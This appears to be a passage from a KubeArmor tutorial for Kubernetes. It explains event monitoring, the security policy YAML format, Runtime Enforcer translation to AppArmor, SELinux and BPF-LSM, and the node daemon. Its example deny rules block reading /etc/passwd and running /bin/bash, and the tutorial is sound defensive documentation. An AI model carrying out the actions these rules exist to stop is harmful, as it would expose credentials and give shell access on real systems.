}
// Read the raw data into the SyscallContext struct
dataBuff := bytes.NewBuffer(dataRaw)
ctx, err := readContextFromBuff(dataBuff) // Helper to parse raw bytes
if err != nil {
// ... handle parse error ...
continue
}
// Get argument data (file path, network address, etc.)
args, err := GetArgs(dataBuff, ctx.Argnum) // Helper to parse arguments
if err != nil {
// ... handle args error ...
continue
}
containerID := ""
if ctx.PidID != 0 && ctx.MntID != 0 {
// Use Namespace IDs from the event to look up Container ID in NsMap
containerID = mon.LookupContainerID(ctx.PidID, ctx.MntID) // This uses the map from Chapter 2 context
}
// If lookup failed and it's a container NS, maybe replay (simplified out)
// If it's host (PidID/MntID 0) or lookup succeeded...
// Push the combined context (with ContainerID) to another channel for logging/policy processing
mon.ContextChan <- ContextCombined{ContainerID: containerID, ContextSys: ctx, ContextArgs: args}
}
}
}
// LookupContainerID Function (from monitor/processTree.go - shown in Chapter 2 context)
func (mon *SystemMonitor) LookupContainerID(pidns, mntns uint32) string {
// ... implementation using NsMap map ...
// This is where the correlation happens: Namespace IDs -> Container ID
}
// ContextCombined Structure (from monitor/systemMonitor.go)
type ContextCombined struct {
ContainerID string // Added context from lookup
ContextSys SyscallContext // Raw data from eBPF
ContextArgs []interface{} // Parsed arguments from raw data
}
Process
Process execution (execve
, execveat
), process exit (do_exit
), privilege changes (setuid
, setgid
)
Tracepoints, Kprobes, BPF-LSM
File
File open (open
, openat
), delete (unlink
, unlinkat
, rmdir
), change owner (chown
, fchownat
)
Kprobes, Tracepoints, BPF-LSM
Network
Socket creation (socket
), connection attempts (connect
), accepting connections (accept
), binding addresses (bind
), listening on sockets (listen
)
Kprobes, Tracepoints, BPF-LSM
Capability
Use of privileged kernel features (capabilities)
BPF-LSM, Kprobes
Syscall
General system call entry/exit for various calls
Kprobes, Tracepoints
Here is the specification of a security policy.
apiVersion: security.kubearmor.com/v1
kind:KubeArmorPolicy
metadata:
name: [policy name]
namespace: [namespace name]
spec:
severity: [1-10] # --> optional
tags: ["tag", ...] # --> optional
message: [message] # --> optional
selector:
matchLabels:
[key1]: [value1]
[keyN]: [valueN]
matchExpressions:
- key: [label]
operator: [In|NotIn]
values:
- [labels]
process:
matchPaths:
- path: [absolute executable path]
ownerOnly: [true|false] # --> optional
fromSource: # --> optional
- path: [absolute exectuable path]
matchDirectories:
- dir: [absolute directory path]
recursive: [true|false] # --> optional
ownerOnly: [true|false] # --> optional
fromSource: # --> optional
- path: [absolute exectuable path]
matchPatterns:
- pattern: [regex pattern]
ownerOnly: [true|false] # --> optional
file:
matchPaths:
- path: [absolute file path]
readOnly: [true|false] # --> optional
ownerOnly: [true|false] # --> optional
fromSource: # --> optional
- path: [absolute exectuable path]
matchDirectories:
- dir: [absolute directory path]
recursive: [true|false] # --> optional
readOnly: [true|false] # --> optional
ownerOnly: [true|false] # --> optional
fromSource: # --> optional
- path: [absolute exectuable path]
matchPatterns:
- pattern: [regex pattern]
readOnly: [true|false] # --> optional
ownerOnly: [true|false] # --> optional
network:
matchProtocols:
- protocol: [TCP|tcp|UDP|udp|ICMP|icmp]
fromSource: # --> optional
- path: [absolute exectuable path]
capabilities:
matchCapabilities:
- capability: [capability name]
fromSource: # --> optional
- path: [absolute exectuable path]
syscalls:
matchSyscalls:
- syscall:
- syscallX
- syscallY
fromSource: # --> optional
- path: [absolute exectuable path]
- dir: [absolute directory path]
recursive: [true|false] # --> optional
matchPaths:
- path: [absolute directory path | absolute exectuable path]
recursive: [true|false] # --> optional
- syscall:
- syscallX
- syscallY
fromSource: # --> optional
- path: [absolute exectuable path]
- dir: [absolute directory path]
recursive: [true|false] # --> optional
action: [Allow|Audit|Block] (Block by default)
Note Please note that for system calls monitoring we only support audit action no matter what the value of action is
For better understanding, you can check the KubeArmorPolicy spec diagram.
Now, we will briefly explain how to define a security policy.
A security policy starts with the base information such as apiVersion, kind, and metadata. The apiVersion and kind would be the same in any security policies. In the case of metadata, you need to specify the names of a policy and a namespace where you want to apply the policy.
apiVersion: security.kubearmor.com/v1
kind:KubeArmorPolicy
metadata:
name: [policy name]
namespace: [namespace name]
The severity part is somewhat important. You can specify the severity of a given policy from 1 to 10. This severity will appear in alerts when policy violations happen.
severity: [1-10]
The tags part is optional. You can define multiple tags (e.g., WARNING, SENSITIVE, MITRE, STIG, etc.) to categorize security policies.
tags: ["tag1", ..., "tagN"]
The message part is optional. You can add an alert message, and then the message will be presented in alert logs.
message: [message]
The selector part is relatively straightforward. Similar to other Kubernetes configurations, you can specify (a group of) pods based on labels.
selector:
matchLabels:
[key1]: [value1]
[keyN]: [valueN]
Further in selector we can use matchExpressions
to define labels to select/deselect the workloads. Currently, only labels can be matched, so the key should be 'label'. The operator will determine whether the policy should apply to the workloads specified in the values field or not.
Operator: In When the operator is set to In, the policy will be applied only to the workloads that match the labels in the values field.
Operator: NotIn When the operator is set to NotIn, the policy will be applied to all the workloads except that match the labels in the values field.
selector:
matchExpressions:
- key: label
operator: [In|NotIn]
values:
- [label] # string format eg. -> (app=nginx)
NOTE Both
matchExpressions
andmatchLabel
are an ANDed operation.
In the process section, there are three types of matches: matchPaths, matchDirectories, and matchPatterns. You can define specific executables using matchPaths or all executables in specific directories using matchDirectories. In the case of matchPatterns, advanced operators may be able to determine particular patterns for executables by using regular expressions. However, the coverage of regular expressions is highly dependent on AppArmor (Policy Core Reference). Thus, we generally do not recommend using this match.
process:
matchPaths:
- path: [absolute executable path]
ownerOnly: [true|false] # --> optional
fromSource: # --> optional
- path: [absolute executable path]
matchDirectories:
- dir: [absolute directory path]
recursive: [true|false] # --> optional
ownerOnly: [true|false] # --> optional
fromSource: # --> optional
- path: [absolute exectuable path]
matchPatterns:
- pattern: [regex pattern]
ownerOnly: [true|false] # --> optional
In each match, there are three options.
ownerOnly (static action: allow owner only; otherwise block all)
If this is enabled, the owners of the executable(s) defined with matchPaths and matchDirectories will be only allowed to execute.
recursive
If this is enabled, the coverage will extend to the subdirectories of the directory defined with matchDirectories.
fromSource
If a path is specified in fromSource, the executable at the path will be allowed/blocked to execute the executables defined with matchPaths or matchDirectories. For better understanding, let us say that an operator defines a policy as follows. Then, /bin/bash will be only allowed (blocked) to execute /bin/sleep. Otherwise, the execution of /bin/sleep will be blocked (allowed).
process:
matchPaths:
- path: /bin/sleep
fromSource:
- path: /bin/bash
The file section is quite similar to the process section.
file:
matchPaths:
- path: [absolute file path]
readOnly: [true|false] # --> optional
ownerOnly: [true|false] # --> optional
fromSource: # --> optional
- path: [absolute file path]
matchDirectories:
- dir: [absolute directory path]
recursive: [true|false] # --> optional
readOnly: [true|false] # --> optional
ownerOnly: [true|false] # --> optional
fromSource: # --> optional
- path: [absolute file path]
matchPatterns:
- pattern: [regex pattern]
readOnly: [true|false] # --> optional
ownerOnly: [true|false] # --> optional
The only difference between 'process' and 'file' is the readOnly option.
readOnly (static action: allow to read only; otherwise block all)
If this is enabled, the read operation will be only allowed, and any other operations (e.g., write) will be blocked.
In the case of network, there is currently one match type: matchProtocols. You can define specific protocols among TCP, UDP, and ICMP.
network:
matchProtocols:
- protocol: [protocol] # --> [ TCP | tcp | UDP | udp | ICMP | icmp ]
fromSource: # --> optional
- path: [absolute file path]
In the case of capabilities, there is currently one match type: matchCapabilities. You can define specific capability names to allow or block using matchCapabilities. You can check available capabilities in Capability List.
capabilities:
matchCapabilities:
- capability: [capability name]
fromSource: # --> optional
- path: [absolute file path]
In the case of syscalls, there are two types of matches, matchSyscalls and matchPaths. matchPaths can be used to target system calls targeting specific binary path or anything under a specific directory, additionally you can slice based on syscalls generated by a binary or a group of binaries in a directory. You can use matchSyscall as a more general rule to match syscalls from all sources or from specific binaries.
syscalls:
matchSyscalls:
- syscall:
- syscallX
- syscallY
fromSource: # --> optional
- path: [absolute exectuable path]
- dir: [absolute directory path]
recursive: [true|false] # --> optional
matchPaths:
- path: [absolute directory path | absolute exectuable path]
recursive: [true|false] # --> optional
- syscall:
- syscallX
- syscallY
fromSource: # --> optional
- path: [absolute exectuable path]
- dir: [absolute directory path]
recursive: [true|false] # --> optional
There is one options in each match.
fromSource
If a path is specified in fromSource, kubearmor will match only syscalls generated by the defined source. For better undrestanding, lets take the example below. Only unlink system calls generated by /bin/bash
will be matched.
process:
matchPaths:
- path: /bin/sleep
- syscall:
- unlink
fromSource:
- path: /bin/bash
recursive
If this is enabled, the coverage will extend to the subdirectories of the directory.
Action
The action could be Allow, Audit, or Block. Security policies would be handled in a blacklist manner or a whitelist manner according to the action. Thus, you need to define the action carefully. You can refer to Consideration in Policy Action for more details. In the case of the Audit action, we can use this action for policy verification before applying a security policy with the Block action. For System calls monitoring, we only support audit mode no matter what the action is set to.
action: [Allow|Audit|Block]
Welcome back! In the previous chapter, we learned how KubeArmor figures out who is performing an action on your system by understanding Container/Node Identity. We saw how it maps low-level system details like Namespace IDs to higher-level concepts like Pods, containers, and nodes, using information from the Kubernetes API and the container runtime.
Now that KubeArmor knows who is doing something, it needs to decide if that action is allowed. This is the job of the Runtime Enforcer.
Think of the Runtime Enforcer as the actual security guard positioned at the gates and doors of your system. It receives the security rules you defined in your Security Policies (KSP, HSP, CSP). But applications and the operating system don't directly understand KubeArmor policy YAML!
The Runtime Enforcer's main task is to translate these high-level KubeArmor rules into instructions that the underlying operating system's built-in security features can understand and enforce. These OS security features are powerful mechanisms within the Linux kernel designed to control what processes can and cannot do. Common examples include:
AppArmor: Used by distributions like Ubuntu, Debian, and SLES. It uses security profiles that define access controls for individual programs (processes).
SELinux: Used by distributions like Fedora, CentOS/RHEL, and Alpine Linux. It uses a system of labels and rules to control interactions between processes and system resources.
BPF-LSM: A newer mechanism using eBPF programs attached to Linux Security Module (LSM) hooks to enforce security policies directly within the kernel.
When an application or process on your node or inside a container attempts to do something (like open a file, start a new process, or make a network connection), the Runtime Enforcer (via the configured OS security feature) steps in. It checks the translated rules that apply to the identified workload and tells the operating system whether to Allow, Audit, or Block the action.
Let's go back to our example: preventing a web server container (with label app: my-web-app
) from reading /etc/passwd
.
In Chapter 1, we wrote a KubeArmor Policy for this:
In Chapter 2, we saw how KubeArmor's Container/Node Identity component identifies that a specific process trying to read /etc/passwd
belongs to a container running a Pod with the label app: my-web-app
.
Now, the Runtime Enforcer takes over:
It knows the action is "read file /etc/passwd
".
It knows the actor is the container identified as having the label app: my-web-app
.
It looks up the applicable policies for this actor and action.
It finds the block-etc-passwd-read
policy, which says action: Block
for /etc/passwd
.
The Runtime Enforcer, using the underlying OS security module, tells the Linux kernel to Block the read attempt.
The application trying to read the file will receive a "Permission denied" error, and the attempt will be stopped before it can succeed.
KubeArmor is designed to be flexible and work on different Linux systems. It doesn't assume a specific OS security module is available. When KubeArmor starts on a node, it checks which security modules are enabled and supported on that particular system.
You can configure KubeArmor to prefer one enforcer over another using the lsm.lsmOrder
configuration option. KubeArmor will try to initialize the enforcers in the specified order (bpf
, selinux
, apparmor
) and use the first one that is available and successfully initialized. If none of the preferred ones are available, it falls back to any other supported, available LSM. If no supported enforcer can be initialized, KubeArmor will run in a limited capacity (primarily for monitoring, not enforcement).
You can see KubeArmor selecting the LSM in the NewRuntimeEnforcer
function (from KubeArmor/enforcer/runtimeEnforcer.go
):
This snippet shows that KubeArmor checks for available LSMs (lsms
) and attempts to initialize its corresponding enforcer module (be.NewBPFEnforcer
, NewAppArmorEnforcer
, NewSELinuxEnforcer
) based on configuration and availability. The first one that succeeds becomes the active EnforcerType
.
Once an enforcer is selected and initialized, the KubeArmor Daemon on the node loads the relevant policies for the workloads it is protecting and translates them into the specific rules required by the chosen enforcer.
When KubeArmor needs to enforce a policy on a specific container or node, here's a simplified flow:
Policy Change/Discovery: A KubeArmor Policy (KSP, HSP, or CSP) is applied or changed via the Kubernetes API. The KubeArmor Daemon on the relevant node detects this.
Identify Affected Workloads: The daemon determines which specific containers or the host node are targeted by this policy change using the selectors and its internal Container/Node Identity mapping.
Translate Rules: For each affected workload, the daemon takes the high-level policy rules (e.g., Block access to /etc/passwd
) and translates them into the low-level format required by the active Runtime Enforcer (AppArmor, SELinux, or BPF-LSM).
Load Rules into OS: The daemon interacts with the operating system to load or update these translated rules. This might involve writing files, calling system utilities (apparmor_parser
, chcon
), or interacting with BPF system calls and maps.
OS Enforcer Takes Over: The OS kernel's security module (now configured by KubeArmor) is now active.
Action Attempt: A process within the protected workload attempts a specific action (e.g., opening /etc/passwd
).
Interception: The OS kernel intercepts this action using hooks provided by its security module.
Decision: The security module checks the rules previously loaded by KubeArmor that apply to the process and resource involved. Based on the action
(Allow, Audit, Block) defined in the KubeArmor policy (and translated into the module's format), the security module makes a decision.
Enforcement:
If Block
, the OS prevents the action and returns an error to the process.
If Allow
, the OS permits the action.
If Audit
, the OS permits the action but generates a log event.
Event Notification (for Audit/Block): (As we'll see in the next chapter), the OS kernel generates an event notification for blocked or audited actions, which KubeArmor then collects for logging and alerting.
Here's a simplified sequence diagram for the enforcement path after policies are loaded:
This diagram shows that the actual enforcement decision happens deep within the OS kernel, powered by the rules that KubeArmor translated and loaded. KubeArmor isn't in the critical path for every action attempt; it pre-configures the kernel's security features to handle the enforcement directly.
Let's see how KubeArmor interacts with the different OS enforcers.
AppArmor Enforcer:
AppArmor uses text-based profile files stored typically in /etc/apparmor.d/
. KubeArmor translates its policies into rules written in AppArmor's profile language, saves them to a file, and then uses the apparmor_parser
command-line tool to load or update these profiles in the kernel.
This snippet shows the key steps: generating the profile content, writing it to a file path based on the container/profile name, and then executing the apparmor_parser
command with the -r
(reload) and -W
(wait) flags to apply the profile to the kernel.
SELinux Enforcer:
SELinux policy management is complex, often involving compiling policy modules and managing file contexts. KubeArmor's SELinux enforcer focuses primarily on basic host policy enforcement (in standalone mode, not typically in Kubernetes clusters using the default SELinux integration). It interacts with tools like chcon
to set file security contexts based on policies.
This snippet shows KubeArmor executing the chcon
command to modify the SELinux security context (label) of files, which is a key way SELinux enforces access control.
BPF-LSM Enforcer:
The BPF-LSM enforcer works differently. Instead of writing text files and using external tools, it loads eBPF programs directly into the kernel and populates eBPF maps with rule data. When an event occurs, the eBPF program attached to the relevant LSM hook checks the rules stored in the map to make the enforcement decision.
This heavily simplified snippet shows how the BPF enforcer loads BPF programs and attaches them to kernel LSM hooks. It also hints at how container identity (Container/Node Identity) is used (via pidns
, mntns
) as a key to organize rules within BPF maps (BPFContainerMap
), allowing the kernel's BPF program to quickly look up the relevant policy when an event occurs. The AddContainerIDToMap
function, although simplified, demonstrates how KubeArmor populates these maps.
Each enforcer type requires specific logic within KubeArmor to translate policies and interact with the OS. The Runtime Enforcer component provides this abstraction layer, allowing KubeArmor policies to be enforced regardless of the underlying Linux security module, as long as it's supported.
The action
specified in your KubeArmor policy (Security Policies) directly maps to how the Runtime Enforcer instructs the OS:
Allow: The translated rule explicitly permits the action. The OS security module will let the action proceed.
Audit: The translated rule allows the action but is configured to generate a log event. The OS security module lets the action proceed and notifies the kernel's logging system.
Block: The translated rule denies the action. The OS security module intercepts the action and prevents it from completing, typically returning an error to the application.
This allows you to use KubeArmor policies not just for strict enforcement but also for visibility and testing (Audit
).
The Runtime Enforcer is the critical piece that translates your human-readable KubeArmor policies into the low-level language understood by the operating system's security features (AppArmor, SELinux, BPF-LSM). It's responsible for loading these translated rules into the kernel, enabling the OS to intercept and enforce your desired security posture for containers and host processes based on their identity.
By selecting the appropriate enforcer for your system and dynamically updating its rules, KubeArmor ensures that your security policies are actively enforced at runtime. In the next chapter, we'll look at the other side of runtime security: observing system events, including those that were audited or blocked by the Runtime Enforcer.
# simplified KSP
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
name: block-etc-passwd-read
namespace: default
spec:
selector:
matchLabels:
app: my-web-app # Policy applies to containers/pods with this label
file:
matchPaths:
- path: /etc/passwd # Specific file to protect
# No readOnly specified means all access types are subject to 'action'
action: Block # What to do if the rule is violated
// KubeArmor/enforcer/runtimeEnforcer.go (Simplified)
func NewRuntimeEnforcer(node tp.Node, pinpath string, logger *fd.Feeder, monitor *mon.SystemMonitor) *RuntimeEnforcer {
// ... code to check available LSMs on the system ...
// This selectLsm function tries to find and initialize the best available enforcer
return selectLsm(re, cfg.GlobalCfg.LsmOrder, availablelsms, lsms, node, pinpath, logger, monitor)
}
// selectLsm Function (Simplified logic)
func selectLsm(re *RuntimeEnforcer, lsmOrder, availablelsms, supportedlsm []string, node tp.Node, pinpath string, logger *fd.Feeder, monitor *mon.SystemMonitor) *RuntimeEnforcer {
// Try LSMs in preferred order first
// If preferred fails or is not available, try others
if kl.ContainsElement(supportedlsm, "bpf") && kl.ContainsElement(availablelsms, "bpf") {
// Attempt to initialize BPFEnforcer
re.bpfEnforcer, err = be.NewBPFEnforcer(...)
if re.bpfEnforcer != nil {
re.EnforcerType = "BPFLSM"
// Success, return BPF enforcer
return re
}
// BPF failed, try next...
}
if kl.ContainsElement(supportedlsm, "apparmor") && kl.ContainsElement(availablelsms, "apparmor") {
// Attempt to initialize AppArmorEnforcer
re.appArmorEnforcer = NewAppArmorEnforcer(...)
if re.appArmorEnforcer != nil {
re.EnforcerType = "AppArmor"
// Success, return AppArmor enforcer
return re
}
// AppArmor failed, try next...
}
if !kl.IsInK8sCluster() && kl.ContainsElement(supportedlsm, "selinux") && kl.ContainsElement(availablelsms, "selinux") {
// Attempt to initialize SELinuxEnforcer (only for host policies outside K8s)
re.seLinuxEnforcer = NewSELinuxEnforcer(...)
if re.seLinuxEnforcer != nil {
re.EnforcerType = "SELinux"
// Success, return SELinux enforcer
return re
}
// SELinux failed, try next...
}
// No supported/available enforcer found
return nil
}
// KubeArmor/enforcer/appArmorEnforcer.go (Simplified)
// UpdateAppArmorProfile Function
func (ae *AppArmorEnforcer) UpdateAppArmorProfile(endPoint tp.EndPoint, appArmorProfile string, securityPolicies []tp.SecurityPolicy) {
// ... code to generate the AppArmor profile string based on KubeArmor policies ...
// This involves iterating through securityPolicies and converting them to AppArmor rules
newProfileContent := "## == Managed by KubeArmor == ##\n...\n" // generated content
// Write the generated profile to a file
newfile, err := os.Create(filepath.Clean("/etc/apparmor.d/" + appArmorProfile))
// ... error handling ...
_, err = newfile.WriteString(newProfileContent)
// ... error handling and file closing ...
// Load/reload the profile into the kernel using apparmor_parser
if err := kl.RunCommandAndWaitWithErr("apparmor_parser", []string{"-r", "-W", "/etc/apparmor.d/" + appArmorProfile}); err != nil {
// Log error if loading fails
ae.Logger.Warnf("Unable to update ... (%s)", err.Error())
return
}
ae.Logger.Printf("Updated security rule(s) to %s/%s", endPoint.EndPointName, appArmorProfile)
}
// KubeArmor/enforcer/SELinuxEnforcer.go (Simplified)
// UpdateSELinuxLabels Function
func (se *SELinuxEnforcer) UpdateSELinuxLabels(profilePath string) bool {
// ... code to read translated policy rules from a file ...
// The file contains rules like "SubjectLabel SubjectPath ObjectLabel ObjectPath ..."
res := true
// Iterate through rules from the profile file
for _, line := range strings.Split(string(profile), "\n") {
words := strings.Fields(line)
if len(words) != 7 { continue }
subjectLabel := words[0]
subjectPath := words[1]
objectLabel := words[2]
objectPath := words[3]
// Example: Change the label of a file/directory using chcon
if subjectLabel == "-" { // Rule doesn't specify subject path label
if err := kl.RunCommandAndWaitWithErr("chcon", []string{"-t", objectLabel, objectPath}); err != nil {
// Log error if chcon fails
se.Logger.Warnf("Unable to update the SELinux label (%s) of %s (%s)", objectLabel, objectPath, err.Error())
res = false
}
} else { // Rule specifies both subject and object path labels
if err := kl.RunCommandAndWaitWithErr("chcon", []string{"-t", subjectLabel, subjectPath}); err != nil {
se.Logger.Warnf("Unable to update the SELinux label (%s) of %s (%s)", subjectLabel, subjectPath, err.Error())
res = false
}
if err := kl.RunCommandAndWaitWithErr("chcon", []string{"-t", objectLabel, objectPath}); err != nil {
se.Logger.Warnf("Unable to update the SELinux label (%s) of %s (%s)", objectLabel, objectPath, err.Error())
res = false
}
}
// ... handles directory and recursive options ...
}
return res
}
// KubeArmor/enforcer/bpflsm/enforcer.go (Simplified)
// NewBPFEnforcer instantiates a objects for setting up BPF LSM Enforcement
func NewBPFEnforcer(node tp.Node, pinpath string, logger *fd.Feeder, monitor *mon.SystemMonitor) (*BPFEnforcer, error) {
// ... code to remove memory lock limits for BPF programs ...
// Load the BPF programs and maps compiled from the C code
if err := loadEnforcerObjects(&be.obj, &ebpf.CollectionOptions{
Maps: ebpf.MapOptions{PinPath: pinpath},
}); err != nil {
// Handle loading errors
be.Logger.Errf("error loading BPF LSM objects: %v", err)
return be, err
}
// Attach BPF programs to LSM hooks
// Example: Attach the 'EnforceProc' program to the 'security_bprm_check' LSM hook
be.Probes[be.obj.EnforceProc.String()], err = link.AttachLSM(link.LSMOptions{Program: be.obj.EnforceProc})
if err != nil {
// Handle attachment errors
be.Logger.Errf("opening lsm %s: %s", be.obj.EnforceProc.String(), err)
return be, err
}
// ... similarly attach other BPF programs for file, network, capabilities, etc. ...
// Get references to BPF maps (like the map storing rules per container)
be.BPFContainerMap = be.obj.KubearmorContainers // Renamed from be.obj.Maps.KubearmorContainers
// ... setup ring buffer for events (discussed in next chapter) ...
return be, nil
}
// AddContainerIDToMap Function (Example of populating a map with rules)
func (be *BPFEnforcer) AddContainerIDToMap(containerID string, pidns, mntns uint32) {
// ... code to get/generate rules for this container ...
// rulesData := generateBPFRules(containerID, policies)
// Look up or create the inner map for this container's rules
containerMapKey := NsKey{PidNS: pidns, MntNS: mntns} // Uses namespace IDs as the key for the outer map
// Update the BPF map with the container's rules or identity
// This would typically involve creating/getting a reference to an inner map
// and then populating that inner map with specific path -> rule mappings.
// For simplification, let's assume a direct mapping for identity:
containerMapValue := uint32(1) // Simplified: A value indicating the container is active
if err := be.BPFContainerMap.Update(containerMapKey, containerMapValue, cle.UpdateAny); err != nil {
be.Logger.Warnf("Error updating BPF map for container %s: %v", containerID, err)
}
// ... More complex logic would add rules to an inner map associated with this containerMapKey
}
Welcome back to the KubeArmor tutorial! In our journey so far, we've explored the key components that make KubeArmor work:
Security Policies: Your rulebooks for security.
Container/Node Identity: How KubeArmor knows who is doing something.
Runtime Enforcer: The component that translates policies into kernel rules and blocks forbidden actions.
System Monitor: KubeArmor's eyes and ears, observing system events.
BPF (eBPF): The powerful kernel technology powering much of the monitoring and enforcement.
In this chapter, we'll look at the KubeArmor Daemon. If the other components are like specialized tools or senses, the KubeArmor Daemon is the central brain and orchestrator that lives on each node. It brings all these pieces together, allowing KubeArmor to function as a unified security system.
The KubeArmor Daemon is the main program that runs on every node (Linux server) where you want KubeArmor to provide security. When you install KubeArmor, you typically deploy it as a DaemonSet in Kubernetes, ensuring one KubeArmor Daemon pod runs on each of your worker nodes. If you're using KubeArmor outside of Kubernetes (on a standalone Linux server or VM), the daemon runs directly as a system service.
Think of the KubeArmor Daemon as the manager for that specific node. Its responsibilities include:
Starting and stopping all the other KubeArmor components (System Monitor, Runtime Enforcer, Log Feeder).
Communicating with external systems like the Kubernetes API server or the container runtime (Docker, containerd, CRI-O) to get information about running workloads and policies.
Building and maintaining the internal mapping for Container/Node Identity.
Fetching and processing Security Policies (KSP, HSP, CSP) that apply to the workloads on its node.
Instructing the Runtime Enforcer on which policies to load and enforce for specific containers and the host.
Receiving security events and raw data from the System Monitor.
Adding context (like identity) to raw events received from the monitor.
Forwarding processed logs and alerts to the Log Feeder for external consumption.
Handling configuration changes and responding to shutdown signals.
Without the Daemon, the individual components couldn't work together effectively to provide end-to-end security.
Let's trace the journey of a security policy and a system event, highlighting the Daemon's role.
Imagine you want to protect a specific container, say a database pod with label app: my-database
, by blocking it from executing the /bin/bash
command. You create a KubeArmor Policy (KSP) like this:
# Simplified KSP
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
name: block-bash-in-db
namespace: default
spec:
selector:
matchLabels:
app: my-database
process:
matchPaths:
- path: /bin/bash
action: Block
And let's say later, a process inside that database container actually attempts to run /bin/bash
.
Here's how the KubeArmor Daemon on the node hosting that database pod orchestrates the process:
Policy Discovery: The KubeArmor Daemon, which is watching the Kubernetes API server, detects your new block-bash-in-db
policy.
Identify Targets: The Daemon processes the policy's selector
(app: my-database
). It checks its internal state (built by talking to the Kubernetes API and container runtime) to find which running containers/pods on its node match this label. It identifies the specific database container.
Prepare Enforcement: The Daemon takes the policy rule (Block /bin/bash
) and tells its Runtime Enforcer component to load this rule specifically for the identified database container. The Enforcer translates this into the format needed by the underlying OS security module (AppArmor, SELinux, or BPF-LSM) and loads it into the kernel.
System Event: A process inside the database container tries to execute /bin/bash
.
Event Detection & Enforcement: The OS kernel intercepts this action. If using BPF-LSM, the Runtime Enforcer's BPF program checks the loaded policy rules (which the Daemon put there). It sees the rule to Block
/bin/bash
for this container's identity. The action is immediately blocked by the kernel.
Event Monitoring & Context: Simultaneously, the System Monitor's BPF programs also detect the exec
attempt on /bin/bash
. It collects details like the process ID, the attempted command, and the process's Namespace IDs. It sends this raw data to the Daemon (via a BPF ring buffer).
Event Processing: The Daemon receives the raw event from the Monitor. It uses the Namespace IDs to look up the Container/Node Identity in its internal map, identifying that this event came from the database container (app: my-database
). It sees the event includes an error code indicating it was blocked by the security module.
Log Generation: The Daemon formats a detailed log/alert message containing all the information: the event type (process execution), the command (/bin/bash
), the outcome (Blocked), and the workload identity (container ID, Pod Name, Namespace, Labels).
Log Forwarding: The Daemon sends this formatted log message to its Log Feeder component, which then forwards it to your configured logging/monitoring system.
This diagram illustrates how the Daemon acts as the central point, integrating information flow and control between external systems (K8s, CRI), the low-level kernel components (Monitor, Enforcer), and the logging/alerting system.
Let's look at the core structure representing the KubeArmor Daemon in the code. It holds references to all the components it manages and the data it needs.
Referencing KubeArmor/core/kubeArmor.go
:
// KubeArmorDaemon Structure (Simplified)
type KubeArmorDaemon struct {
// node information
Node tp.Node
NodeLock *sync.RWMutex
// flag
K8sEnabled bool
// K8s pods, containers, endpoints, owner info
// These map identity details collected from K8s/CRI
K8sPods []tp.K8sPod
K8sPodsLock *sync.RWMutex
Containers map[string]tp.Container
ContainersLock *sync.RWMutex
EndPoints []tp.EndPoint
EndPointsLock *sync.RWMutex
OwnerInfo map[string]tp.PodOwner
// Security policies watched from K8s API
SecurityPolicies []tp.SecurityPolicy
SecurityPoliciesLock *sync.RWMutex
HostSecurityPolicies []tp.HostSecurityPolicy
HostSecurityPoliciesLock *sync.RWMutex
// logger component
Logger *fd.Feeder
// system monitor component
SystemMonitor *mon.SystemMonitor
// runtime enforcer component
RuntimeEnforcer *efc.RuntimeEnforcer
// Used for managing background goroutines
WgDaemon sync.WaitGroup
// ... other fields for health checks, state agent, etc. ...
}
Explanation:
The KubeArmorDaemon
struct contains fields like Node
(details about the node it runs on), K8sEnabled
(whether it's in a K8s cluster), and maps/slices to store information about K8sPods
, Containers
, EndPoints
, and parsed SecurityPolicies
. Locks (*sync.RWMutex
) are used to safely access this shared data from multiple parts of the Daemon's logic.
Crucially, it has pointers to the other main components: Logger
, SystemMonitor
, and RuntimeEnforcer
. This shows that the Daemon owns and interacts with instances of these components.
WgDaemon
is a sync.WaitGroup
used to track background processes (goroutines) started by the Daemon, allowing for a clean shutdown.
When KubeArmor starts on a node, the KubeArmor()
function in KubeArmor/main.go
(which calls into KubeArmor/core/kubeArmor.go
) initializes and runs the Daemon.
Here's a simplified look at the initialization steps within the KubeArmor()
function:
// KubeArmor Function (Simplified)
func KubeArmor() {
// create a daemon instance
dm := NewKubeArmorDaemon()
// dm is our KubeArmorDaemon object on this node
// ... Node info setup (whether in K8s or standalone) ...
// initialize log feeder component
if !dm.InitLogger() {
// handle error and destroy daemon
return
}
dm.Logger.Print("Initialized KubeArmor Logger")
// Start logger's background process to serve feeds
go dm.ServeLogFeeds()
// ... StateAgent, Health Server initialization ...
// initialize system monitor component
if cfg.GlobalCfg.Policy || cfg.GlobalCfg.HostPolicy { // Only if policy/hostpolicy is enabled
if !dm.InitSystemMonitor() {
// handle error and destroy daemon
return
}
dm.Logger.Print("Initialized KubeArmor Monitor")
// Start system monitor's background processes to trace events
go dm.MonitorSystemEvents()
// initialize runtime enforcer component
// It receives the SystemMonitor instance because the BPF enforcer
// might need info from the monitor (like pin paths)
if !dm.InitRuntimeEnforcer(dm.SystemMonitor.PinPath) {
dm.Logger.Print("Disabled KubeArmor Enforcer since No LSM is enabled")
} else {
dm.Logger.Print("Initialized KubeArmor Enforcer")
}
// ... Presets initialization ...
}
// ... K8s/CRI specific watching for Pods/Containers/Policies ...
// wait for a while (initialization sync)
// ... Policy and Pod watching (K8s specific) ...
// listen for interrupt signals to trigger shutdown
sigChan := GetOSSigChannel()
<-sigChan // This line blocks until a signal is received
// destroy the daemon (calls Close methods on components)
dm.DestroyKubeArmorDaemon()
}
// NewKubeArmorDaemon Function (Simplified)
func NewKubeArmorDaemon() *KubeArmorDaemon {
dm := new(KubeArmorDaemon)
// Initialize maps, slices, locks, and component pointers to nil/empty
dm.NodeLock = new(sync.RWMutex)
dm.K8sPodsLock = new(sync.RWMutex)
dm.ContainersLock = new(sync.RWMutex)
dm.EndPointsLock = new(sync.RWMutex)
dm.SecurityPoliciesLock = new(sync.RWMutex)
dm.HostSecurityPoliciesLock = new(sync.RWMutex)
dm.DefaultPosturesLock = new(sync.Mutex)
dm.ActivePidMapLock = new(sync.RWMutex)
dm.MonitorLock = new(sync.RWMutex)
dm.Containers = map[string]tp.Container{}
dm.EndPoints = []tp.EndPoint{}
dm.OwnerInfo = map[string]tp.PodOwner{}
dm.DefaultPostures = map[string]tp.DefaultPosture{}
dm.ActiveHostPidMap = map[string]tp.PidMap{}
// Pointers to components (Logger, Monitor, Enforcer) are initially nil
return dm
}
// InitSystemMonitor Function (Called by Daemon)
func (dm *KubeArmorDaemon) InitSystemMonitor() bool {
// Create a new SystemMonitor instance, passing it data it needs
dm.SystemMonitor = mon.NewSystemMonitor(
